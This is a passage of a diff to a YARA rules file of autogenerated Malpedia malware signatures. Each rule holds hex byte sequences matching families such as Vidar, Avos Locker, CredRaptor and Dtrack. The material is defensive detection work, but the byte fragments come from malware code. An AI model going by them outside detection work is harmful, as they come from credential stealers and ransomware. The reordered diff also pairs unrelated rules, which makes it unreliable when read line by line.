e8???????? 68???????? 8d5c3e04 e8???????? } + $sequence_4 = { 898c1d0afcffff 83c410 66c7841d0efcffff4501 8d7001 8a08 } + $sequence_5 = { 8d8375050000 6a00 a3???????? ff15???????? } + $sequence_6 = { 0fb7c0 8bf0 6689841d10fcffff 56 83c316 8d941dfcfbffff 68???????? } + $sequence_7 = { f3a5 66a5 8b15???????? 8990fa0d0000 8b0d???????? } + $sequence_8 = { 8bd8 c745fcffffffff 85db 7516 56 e8???????? } + $sequence_9 = { c3 e8???????? 85c0 0f8487660000 c3 833d????????ff 7503 } + $sequence_10 = { 894dfc 80fb08 750f 32db } + $sequence_11 = { 33c0 40 e9???????? 8365c800 c745cc231a0110 a1???????? 8d4dc8 } + $sequence_12 = { 8d940dfcfbffff 52 e8???????? 83c40c 0fb685f7f3ffff } + $sequence_13 = { c1e100 8b9568f3ffff 8991a8ad0110 8b85f8f3ffff 05b4130000 668985f0f3ffff } + $sequence_14 = { 8841ff 83ea01 75f2 8b542424 8a1a 8d4701 50 } + $sequence_15 = { 8b049594440110 8985ccf6ffff 85c0 757c 50 8985d4f4ffff 89855cfcffff } condition: - 7 of them and filesize <98304 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Logpos_Auto : FILE +rule MALPEDIA_Win_Chainshot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1863375d-233c-50fe-9230-efcb27bcbb2c" + id = "beaf03a9-9558-5280-a84b-64277bd4ffc2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.logpos_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chainshot_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "c3acfde126a6fa182645fe56f6caf8ed6c2b8f53215730338bb39d48d6bd3dac" + logic_hash = "ba9c33c28d22ea04923b796ce7a5cfd0e30c1f14b0a956e4cbe61344e61c7def" score = 75 quality = 75 tags = "FILE" @@ -172253,32 +174943,32 @@ rule MALPEDIA_Win_Logpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89e5 0fb64508 83f830 0f8c13000000 83f839 0f8f0a000000 } - $sequence_1 = { 89ec 5d c3 55 89e5 83ec20 53 } - $sequence_2 = { 884c2408 0fb6442408 83f841 0f8c09000000 83f85a 0f8e37000000 0fb6442408 } - $sequence_3 = { 53 e8???????? 894330 682a5a9294 ff33 ff7370 } - $sequence_4 = { 8b4d10 8a450c 8b7d08 fc f3aa 61 } - $sequence_5 = { ff9380000000 48 83c420 48 85f6 7409 48 } - $sequence_6 = { c785f8fbffff01000000 68f4010000 ff15???????? 0fb69507fcffff b90f000000 } - $sequence_7 = { 83f800 0f8537000000 833d????????00 0f852a000000 837d1400 0f848c000000 } - $sequence_8 = { 5a c9 c3 41 52 } - $sequence_9 = { 0f8549000000 8b45fc c680a360400000 8b45fc } + $sequence_0 = { 731b 85c9 7906 b840000000 } + $sequence_1 = { 8d68fc c70726000000 e9???????? c70709000000 bd02000000 } + $sequence_2 = { 7509 e8???????? 85c0 7808 } + $sequence_3 = { 6683f819 7705 8d4220 eb03 0fb7c2 0fb7c0 } + $sequence_4 = { b901070080 e8???????? eb89 8bd7 } + $sequence_5 = { 7408 ffd0 8905???????? bfa3000080 e9???????? } + $sequence_6 = { ffc8 0f843a110000 ffc8 7427 83e803 0f844a110000 } + $sequence_7 = { 7408 ffd0 8905???????? bb82000080 } + $sequence_8 = { 8d4a02 b8abaaaaaa f7e1 d1ea } + $sequence_9 = { ffc8 747a ffc8 7461 83e802 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <802816 } -rule MALPEDIA_Win_Blackpos_Auto : FILE +rule MALPEDIA_Win_Wipbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "52663687-3a52-5b88-8f0a-e8064cfb2262" + id = "2dc6790b-0815-56da-b4e1-b1ab1c837c71" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackpos_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wipbot_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "8568ffc0a3f0ef5ce5cdc7a729339af7d16e27d116b4f347ef077609e2cc96da" + logic_hash = "b4a431b5982e86b4c79c71104a1485b7ef9ede4d9bcd19d6e305251f54be5168" score = 75 quality = 75 tags = "FILE" @@ -172292,32 +174982,32 @@ rule MALPEDIA_Win_Blackpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? b800000200 3bf8 7602 8bf8 8d85f4fffdff } - $sequence_1 = { 3bca 7408 47 83ff44 72ef eb08 } - $sequence_2 = { 83c414 85c0 7433 e8???????? 85c0 } - $sequence_3 = { 8d4dbc 51 03c6 50 e8???????? } - $sequence_4 = { 3bfb 0f84f8000000 68ff030000 8d85fdfbffff 53 50 } - $sequence_5 = { f7f9 8b4dfc 5f 5e 5b 8bc2 } - $sequence_6 = { 8b8040f84100 3bf0 7e44 83ee07 eb3f 2503000080 7905 } - $sequence_7 = { 3bf7 7513 8d45e0 50 e8???????? 59 } - $sequence_8 = { 6a07 59 6804010000 be???????? } - $sequence_9 = { e8???????? 83c40c 85c0 7414 6a01 68???????? } + $sequence_0 = { eb05 b8???????? e8???????? 89da 83c9ff e8???????? } + $sequence_1 = { 5b 5d e9???????? 5a 31c0 5b 5d } + $sequence_2 = { 4c 8d442428 baff010f00 48 89d9 ffd0 48 } + $sequence_3 = { b911000000 31c0 c644245e2e 31d2 f3aa c644245f0b c64424601f } + $sequence_4 = { 85c0 48 89c6 0f94c2 48 85db 0f94c0 } + $sequence_5 = { 8d44245f 88d1 48 01d0 48 ffc2 3208 } + $sequence_6 = { eb7d 48 894c2438 e8???????? 01c0 ba9ad65fb0 b98a758b1f } + $sequence_7 = { 8d55f4 89542408 8d55f0 c744240c00800000 89542404 c70424ffffffff ffd0 } + $sequence_8 = { 89cb b91d000000 c64424222e f3aa c644242379 c644242446 31c0 } + $sequence_9 = { 8944240c 8b45a8 83c020 890424 ffd2 85c0 0f9fc0 } condition: - 7 of them and filesize <3293184 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE +rule MALPEDIA_Win_Former_First_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5291555a-238b-5124-8c5e-fbe5c6dae533" + id = "e13a8bc3-e4cb-54c7-a2c1-b71b74a37c2c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nozelesn_decryptor_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.former_first_rat_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "1af6964230aa159d6a9d9c0e30b792e1839c5e421f268df94cf1e56da3b12562" + logic_hash = "79676675a5e0c5d1eb84217b80928525157e507544e18d7d0452685a540a1268" score = 75 quality = 75 tags = "FILE" @@ -172331,32 +175021,38 @@ rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b459c 8d4dd8 51 8b00 8b701c 8bce e8???????? } - $sequence_1 = { c7401000000000 c7401407000000 668908 c645fc06 8bb5ccfbffff 85f6 0f848d100000 } - $sequence_2 = { 8bc1 83e801 747b 83e801 7466 2d0f010000 7416 } - $sequence_3 = { 3bcf 7c10 7f07 3d???????? 7607 bf???????? eb02 } - $sequence_4 = { 743f 8b7b0c eb28 8b4608 } - $sequence_5 = { 8b5508 85d2 7436 8bc2 8945fc 83fa04 721f } - $sequence_6 = { ff7730 c745fc01000000 8945a0 c645ac00 c645ad00 e8???????? 8d4584 } - $sequence_7 = { e8???????? 837b3800 884340 7510 8b430c 8bcb 83c804 } - $sequence_8 = { 33d7 8945e8 33d6 8bf0 c1c20d 33f1 8bc2 } - $sequence_9 = { 7428 8b03 8d4d90 51 8b7018 8bce e8???????? } + $sequence_0 = { 899424ec030000 898c24e8030000 8b4f10 8d9424e8030000 6a00 52 898424f8030000 } + $sequence_1 = { 894c240c 8bd3 3bc1 7420 8d642400 8bf0 } + $sequence_2 = { 52 bb1c000000 8d742428 894c245c c744246000000000 } + $sequence_3 = { e8???????? 8b8d0cffffff 68???????? 51 e8???????? } + $sequence_4 = { ff15???????? 33c0 66833d????????09 0f94c0 a3???????? 6808020000 } + $sequence_5 = { c785e8feffff0f000000 899decfeffff 899df0feffff 899d04ffffff 899df4feffff } + $sequence_6 = { e8???????? 8d8de0feffff 51 bb08000000 e8???????? 8b9df8feffff 57 } + $sequence_7 = { 8bf2 8bfb 81c208020000 b982000000 81c308020000 f3a5 3bd0 } + $sequence_8 = { 48897c2428 488d05169b0200 488907 488d4f08 e8???????? } + $sequence_9 = { 480f42db 4883792010 7206 488b4908 eb04 } + $sequence_10 = { 48837e2008 7209 488b4e08 e8???????? 488d4608 } + $sequence_11 = { 48895c2468 0f28442450 660f7f442450 0f284c2460 660f7f4c2460 } + $sequence_12 = { 48896c2460 40886c2450 488bcb e8???????? } + $sequence_13 = { 488d4754 48894760 48832100 488b4748 48832000 } + $sequence_14 = { 90 48017e20 488b7620 4881c670ffffff } + $sequence_15 = { 488b7968 488d0532800200 8bf2 488bd9 } condition: - 7 of them and filesize <1122304 + 7 of them and filesize <626688 } -rule MALPEDIA_Win_Remsec_Strider_Auto : FILE +rule MALPEDIA_Win_Avos_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5cf05a79-eeb6-5c58-8271-14cb9c81c326" + id = "7ba0a3b7-52b3-54b0-beef-ae9816fdb70a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remsec_strider_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avos_locker_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "69887265225a27114e8e9d83252b405933e8e0558a06ab3222eee20510a77720" + logic_hash = "20760e04f44624b7366badbec4c361401e8cc12f236ee2efc4fb15277f942fc5" score = 75 quality = 75 tags = "FILE" @@ -172370,34 +175066,34 @@ rule MALPEDIA_Win_Remsec_Strider_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 74f7 8b4130 2dbc97e889 f7d8 1bc0 f7d0 } - $sequence_1 = { 6a1a 58 6a10 8945e4 8945e8 58 } - $sequence_2 = { c9 c20800 55 8bec b804000100 } - $sequence_3 = { 85c9 74f7 8b4130 2dbc97e889 } - $sequence_4 = { 6803010000 50 ff15???????? 83c414 8d45f0 50 } - $sequence_5 = { 0d00000040 50 8d85e8fdffff 50 } - $sequence_6 = { ebf5 8b432c ff30 68???????? } - $sequence_7 = { 0510010000 68???????? 6803010000 50 } - $sequence_8 = { ff772c ff15???????? 85c0 7512 ff15???????? 8bc8 } - $sequence_9 = { 85ff 7415 83ff05 7410 68???????? 6a02 } + $sequence_0 = { 8d85a8f9ffff 50 8d85fcf5ffff 50 8d8514f6ffff 50 83ec18 } + $sequence_1 = { 8b4024 ffd0 c645fc0a c78598f9ffff00000000 c7859cf9ffff00000000 8b08 898d98f9ffff } + $sequence_2 = { 59 3b4580 7359 807d8600 8a8848ef4900 8b857cffffff 8808 } + $sequence_3 = { 8d8d05efffff e8???????? 8a8d23f0ffff 8808 46 ebbd 6a22 } + $sequence_4 = { 53 50 e8???????? 83c408 c745fcffffffff 57 8b45d8 } + $sequence_5 = { 8bd3 3ac1 7501 46 42 8a02 84c0 } + $sequence_6 = { c745e800000000 660fd645e4 837de810 8945d4 8b75cc 0f43d0 8b45d0 } + $sequence_7 = { 33c5 50 8d45f4 64a300000000 8b4d0c 8b4508 81f900100000 } + $sequence_8 = { 8a42ff 84c0 75eb 81fe59ee4ef8 740b 8b7118 85ff } + $sequence_9 = { 89958cecffff c645fc35 8bca 8d7102 668b01 83c102 6685c0 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <1701888 } -rule MALPEDIA_Win_Vidar_Auto : FILE +rule MALPEDIA_Win_Dtrack_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "82d78950-07cb-574b-bd37-68a5c755b922" + id = "a233c383-e1c0-5a80-b962-04f71174b55f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vidar_auto.yar#L1-L344" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dtrack_auto.yar#L1-L160" license_url = "N/A" - logic_hash = "a393071c5079ff4f7beb96e2467045a96573fe4c259d05f0ce07fde763d7466d" + logic_hash = "da8244413760aff3fc60e26778e79f2591abffda2d0aa55a6f2fe1a5cc4b0aa3" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -172409,60 +175105,37 @@ rule MALPEDIA_Win_Vidar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 25ff7f0000 c3 e8???????? 8b486c 3b0d???????? 7410 } - $sequence_1 = { 05c39e2600 894114 c1e810 25ff7f0000 c3 e8???????? } - $sequence_2 = { 8d8d68fdffff 51 50 ff15???????? } - $sequence_3 = { 7202 8b00 8d8d68fdffff 51 } - $sequence_4 = { 740a b800000500 e9???????? 57 } - $sequence_5 = { 56 8b742408 8b865caf0100 57 } - $sequence_6 = { 895dd0 c746140f000000 895e10 8975cc } - $sequence_7 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 } - $sequence_8 = { 895dfc e8???????? 83781408 c645fc01 } - $sequence_9 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff } - $sequence_10 = { 5f c6043300 8bc6 5e 5b c20400 } - $sequence_11 = { 50 ff15???????? 8b4da0 8901 85c0 } - $sequence_12 = { 83781410 7202 8b00 50 8b45a0 } - $sequence_13 = { eb02 33c0 5f 5e c9 c3 6a04 } - $sequence_14 = { 5e c20400 ff742408 e8???????? 59 83f8ff 7503 } - $sequence_15 = { c9 c3 8b542408 85d2 7503 } - $sequence_16 = { 0fb605???????? 50 0fb605???????? 50 0fb605???????? 50 6a01 } - $sequence_17 = { 53 50 899e6caf0600 e8???????? } - $sequence_18 = { 53 68???????? 8d8da8000000 e8???????? } - $sequence_19 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 } - $sequence_20 = { c20400 56 8bf1 e8???????? 6a00 ff74240c 8bce } - $sequence_21 = { 0faf450c 50 e8???????? 59 } - $sequence_22 = { 8b4508 8906 8b450c 894608 } - $sequence_23 = { 8b4120 8910 8b4130 8910 c3 56 } - $sequence_24 = { e8???????? c9 c3 55 8bec 83ec18 8b450c } - $sequence_25 = { 8d852cffffff 50 8d459c 50 } - $sequence_26 = { 6860ea0000 6a00 ff15???????? 50 } - $sequence_27 = { 50 ff15???????? 6a1a e8???????? } - $sequence_28 = { 5f c21000 8bff 55 8bec 6a0a } - $sequence_29 = { e8???????? 83c410 85c0 7404 6a99 ebcc } - $sequence_30 = { 7410 84c0 7406 3ac8 7c14 } - $sequence_31 = { 7408 ff36 e8???????? 59 834e04ff 8b06 } - $sequence_32 = { e8???????? 83c408 84c0 740e 68???????? } - $sequence_33 = { 6a0b 6a10 e8???????? 83c41c 8be5 } - $sequence_34 = { eb0b 8b45f4 0500040000 8945f4 } - $sequence_35 = { 83ec08 dd4508 dd1c24 6a0b 6a08 } - $sequence_36 = { 8bc6 8b35???????? 99 2bc2 } - $sequence_37 = { 8bc6 5f 5e 5d 5b 81c460010000 c3 } + $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } + $sequence_1 = { ff15???????? 8d85dcfdffff 50 6a01 } + $sequence_2 = { 8955f0 8b45f0 0fb68899010000 51 8b55f0 } + $sequence_3 = { 8d85ecfeffff 50 8d8dc8fdffff 51 8d95ccfdffff } + $sequence_4 = { 0345f4 8810 ebac e9???????? 8be5 } + $sequence_5 = { 52 8d8590f5ffff 50 ff15???????? c685a0f8ffff00 6803010000 6a00 } + $sequence_6 = { c685b8fbffff00 6803010000 6a00 8d8db9fbffff 51 e8???????? } + $sequence_7 = { 51 e8???????? 83c410 8b558c 52 } + $sequence_8 = { 8b8520f5ffff 8a4801 888d1ff5ffff 838520f5ffff01 } + $sequence_9 = { d1e9 894df8 8b5518 8955fc c745f000000000 eb09 } + $sequence_10 = { 8b45fc c1e808 8b4dfc c1e910 } + $sequence_11 = { c1e810 23c8 33d1 8855f7 8b4df8 c1e908 8b55fc } + $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc } + $sequence_13 = { 6867452301 8b4d10 51 8b55f4 52 } + $sequence_14 = { eb64 8b4d10 51 6a00 8b55f4 52 e8???????? } condition: - 7 of them and filesize <2793472 + 7 of them and filesize <1736704 } -rule MALPEDIA_Win_Feed_Load_Auto : FILE +rule MALPEDIA_Win_Sagerunex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "de841c4a-765f-51dc-8d45-847efc3fe997" + id = "f1b502b3-b120-59e0-983f-cafb93914bcc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.feed_load_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sagerunex_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "904d3316a4655c20d123c0cfc976a8494c8f04b302e9078044dfcb4ef1ebf390" + logic_hash = "08cdcbbbd6ca868eddb1becc5a51582d041936061352010bb8c3c5ac48e633a5" score = 75 quality = 75 tags = "FILE" @@ -172476,32 +175149,111 @@ rule MALPEDIA_Win_Feed_Load_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48897c2428 4d8bc5 41b940200000 e8???????? 85c0 0f84e2000000 } - $sequence_1 = { 0f97c1 493bd2 eb27 4c8d42ff 418a00 4d8d4c24ff 413801 } - $sequence_2 = { 41898500400000 488bfd 4d8bfa bd01000000 83fb0d 0f8c42030000 41690ab179379e } - $sequence_3 = { 668928 e8???????? 4c8d86500c0000 488bcf e8???????? 4c8d442440 488bcf } - $sequence_4 = { 7876 3b1d???????? 736e 488bc3 488bf3 48c1fe06 4c8d2d7a220200 } - $sequence_5 = { 0f8c60040000 41837e0800 4c8d05b755ffff 7429 49635608 48035608 0fb60a } - $sequence_6 = { 8bd5 ff15???????? 448bc5 488bd6 488bc8 4c8bf0 } - $sequence_7 = { 488bc2 4903c7 4103df 803800 75f5 3bdf 7207 } - $sequence_8 = { 4c8d3de9c00100 49393cdf 7402 eb22 e8???????? 498904df } - $sequence_9 = { 488d157b020200 488d4d88 e8???????? cc } + $sequence_0 = { 4c8bb424d8010000 c744245001000000 4c896c2458 4c896c2460 4885c9 742c 4a8d04fd00000000 } + $sequence_1 = { 72d1 498bd4 483bd7 488d4de7 480f42fa 488bd7 e8???????? } + $sequence_2 = { c74324a44ffabe 488bcb 89b3e8000000 c70340000000 e8???????? 488d442420 c60000 } + $sequence_3 = { 498bcc e8???????? 85c0 7849 488d45b0 488d55f0 498bcf } + $sequence_4 = { e8???????? e8???????? ffc7 448bc0 b84fecc44e 41f7e8 c1fa03 } + $sequence_5 = { 4d894838 4c8b5340 458bca 4983d300 49c1ea20 418bc9 4d0fafcf } + $sequence_6 = { 894260 33d2 e8???????? 488d442470 488d15d0230300 } + $sequence_7 = { 83f803 7cc5 eb04 897c2450 443bfe 752a 448b7c2444 } + $sequence_8 = { 498bcf c745df02000000 c745fb01000000 c745e301000000 ff15???????? 85c0 7507 } + $sequence_9 = { 4403c0 418bc6 4503c2 c1c007 c1ca0b 33d0 418bc6 } condition: - 7 of them and filesize <512000 + 7 of them and filesize <619520 } -rule MALPEDIA_Win_Fakerean_Auto : FILE +rule MALPEDIA_Win_Microcin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a7ea6f88-76f7-54f5-a9b5-14fd4ef8d3d9" + id = "7e85e39e-7daa-514d-802c-54d6ff85c6e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fakerean_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.microcin_auto.yar#L1-L465" license_url = "N/A" - logic_hash = "7dfee10ceca58c69279376a54d184530389bbd0c9b8b6dd9a398c5796de2f6f3" + logic_hash = "3f18992fe004fbfcac38bd4eed04ab5733b0957df603607ba4dee35273474322" + score = 75 + quality = 44 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 50 56 ff15???????? 85c0 0f45f7 } + $sequence_1 = { 442bc3 4803d6 4533c9 ff15???????? 85c0 75d9 488b742438 } + $sequence_2 = { ff15???????? 488bcb ff15???????? 448bc0 } + $sequence_3 = { 57 4154 4156 4157 488dac2400fbffff 4881ec00060000 488b05???????? } + $sequence_4 = { e8???????? 83c40c 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff } + $sequence_5 = { 488b09 418bf8 488bf2 33db } + $sequence_6 = { ff15???????? 8b3d???????? 8d85e0feffff 50 } + $sequence_7 = { 488bcb 664489642438 488bf0 ff15???????? } + $sequence_8 = { 68ffff0000 56 8b35???????? ffd6 } + $sequence_9 = { 85c0 7e18 80bc35a8feffff3a 741f 8d85a8feffff 46 50 } + $sequence_10 = { c6840d8002000033 488d8d80020000 ff15???????? 4863c8 c6840d8002000079 } + $sequence_11 = { ff15???????? 8b1d???????? 8d85a8feffff 50 ffd3 } + $sequence_12 = { ff15???????? 4863c8 c6840d7002000062 488d8d70020000 ff15???????? 4863c8 } + $sequence_13 = { ff15???????? 85c0 7426 8b400c } + $sequence_14 = { 33f6 50 ffd3 85c0 7e18 } + $sequence_15 = { 488d4c2460 ff15???????? 4863c8 807c0c5f5c 7413 488d4c2460 ff15???????? } + $sequence_16 = { 41bc14030000 4c8d0574130100 488bcd 418bd4 e8???????? 33c9 85c0 } + $sequence_17 = { 83c108 51 ff15???????? 8b4dfc } + $sequence_18 = { 7370 696465726167656e 742e 657865 } + $sequence_19 = { 6e 6d 656e 7400 } + $sequence_20 = { 8b4510 8b8c8d78feffff 890c90 ebc8 e9???????? } + $sequence_21 = { 7647 498bcd e8???????? 4c8d05b7120100 41b903000000 } + $sequence_22 = { fa fa fa fa fa fa } + $sequence_23 = { 8b4df0 e8???????? 8d45f8 50 6a00 } + $sequence_24 = { 6828010000 8d85ccfeffff 6a00 50 } + $sequence_25 = { 418d7c24e7 85c0 752a 4c8d0502130100 8bd7 498bcd } + $sequence_26 = { 4c8d056c120100 498bd4 488bcd e8???????? 85c0 7541 4c8bc3 } + $sequence_27 = { 636373 7673 6873742e65 7865 } + $sequence_28 = { ff15???????? 8b45f4 8b4824 894dfc 8b55f4 83c208 } + $sequence_29 = { 8945fc eb42 8b45f8 33d2 } + $sequence_30 = { 8bd9 488d0d950c0100 ff15???????? 4885c0 7419 488d15730c0100 488bc8 } + $sequence_31 = { 488d15f8110100 41b810200100 488bcd e8???????? e9???????? 4533c9 4533c0 } + $sequence_32 = { 8b8504ffffff 898574feffff 8b4d0c 8b91fc020000 8b4508 0390f0040000 8b4d10 } + $sequence_33 = { 488bcd e8???????? 85c0 751a 488d15f8110100 41b810200100 } + $sequence_34 = { 8b55fc 83c208 52 ff15???????? 8b45fc c7400421000000 } + $sequence_35 = { 33c9 4889742420 e8???????? cc 4c8d056c120100 } + $sequence_36 = { 83ec08 894df8 c745fc00a40000 6a40 6800100000 6800a40000 6a00 } + $sequence_37 = { 49 53 53 56 43 } + $sequence_38 = { 8b4c2414 33cc e8???????? 8be5 5d c21000 57 } + $sequence_39 = { 0115???????? 1515151503 1515151515 1515041515 1515050607 0809 } + $sequence_40 = { 8d85e8feffff 50 ff95e4feffff 59 59 837d1c00 7513 } + $sequence_41 = { 8b8431f4dfffff 44 2bd8 45 2b9c31f8dfffff 45 895c2404 } + $sequence_42 = { 6a00 8d442448 50 ff15???????? 85c0 7420 } + $sequence_43 = { 8b4c2408 49 8b542410 e8???????? 85c0 74db 89c0 } + $sequence_44 = { f7f7 8365ec00 85c0 0f8e94010000 8365f000 8b7e44 } + $sequence_45 = { 89f1 48 8d5510 e8???????? 90 e8???????? bab3c4b3c4 } + $sequence_46 = { 6a00 8d85b0feffff 50 56 } + $sequence_47 = { 6a00 56 c785b4feffff00000000 ff15???????? 50 56 } + $sequence_48 = { 8d44245c 50 ff15???????? 33c0 5f } + $sequence_49 = { c744241030000000 c744241403000000 c7442418d0114000 c744241c00000000 c744242000000000 89742424 c744242800000000 } + + condition: + 7 of them and filesize <417792 +} +rule MALPEDIA_Win_Credraptor_Auto : FILE +{ + meta: + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "744ed2ca-2dde-53b2-b19d-4369cb84cbb1" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.credraptor_auto.yar#L1-L134" + license_url = "N/A" + logic_hash = "751cbf31cf2ad7ebff2dead521605a0ec12dc4ff6ec97fefa5bfc3c13ba5bce0" score = 75 quality = 75 tags = "FILE" @@ -172515,32 +175267,32 @@ rule MALPEDIA_Win_Fakerean_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 752e 8945fc eb29 395dfc 7524 57 8bce } - $sequence_1 = { 49 6a01 ff750c 50 57 ff7514 40 } - $sequence_2 = { ff15???????? 3d14050000 74e5 ff7508 56 57 ff15???????? } - $sequence_3 = { ff7508 ff15???????? 3bc3 0f8495000000 8b400c 8b00 } - $sequence_4 = { 59 3bc3 7419 8d5010 e8???????? 8945e0 3bc3 } - $sequence_5 = { ff35???????? ff15???????? 6800000500 6aec ff35???????? ff15???????? 680000cf06 } - $sequence_6 = { 741a 81fe00020000 7d12 56 8bc7 e8???????? } - $sequence_7 = { 8b4df0 6bc018 6bc918 8b4c190c 2b4c1804 f7df } - $sequence_8 = { f7d8 1bc0 25bfe0ffff 05401f0000 50 ff35???????? ff15???????? } - $sequence_9 = { 8d45f0 50 8d450c 50 ff15???????? 85c0 7431 } + $sequence_0 = { bb???????? 8bf8 e8???????? 8945fc 8b45f8 83c408 85c0 } + $sequence_1 = { c6402597 895028 8b5120 89502c 8bce 8bc3 e8???????? } + $sequence_2 = { 8d4db4 e8???????? 85c0 754b 8d55b4 52 e8???????? } + $sequence_3 = { b800020000 660bc8 8b45f8 5f 894604 894624 66894e1c } + $sequence_4 = { a900050000 7565 837b1c00 745f 8b4df8 8b5110 52 } + $sequence_5 = { 8b8e14020000 8975f0 895df8 e8???????? 8bf8 83c404 897dfc } + $sequence_6 = { 8db5c8fdffff e8???????? 85c0 7430 8b8dccfdffff 8b7f0c 8b95c8fdffff } + $sequence_7 = { 894d94 8bff 8a01 dd8574ffffff dd05???????? 3c25 7409 } + $sequence_8 = { c7461000000000 53 c60600 e8???????? 83c404 807f4100 8bdf } + $sequence_9 = { bb07000000 85ff 7439 ba60240000 6685571c 7409 57 } condition: - 7 of them and filesize <4071424 + 7 of them and filesize <1728512 } -rule MALPEDIA_Win_Whispergate_Auto : FILE +rule MALPEDIA_Win_Miancha_Auto : FILE { meta: description = "autogenerated rule brought to you by 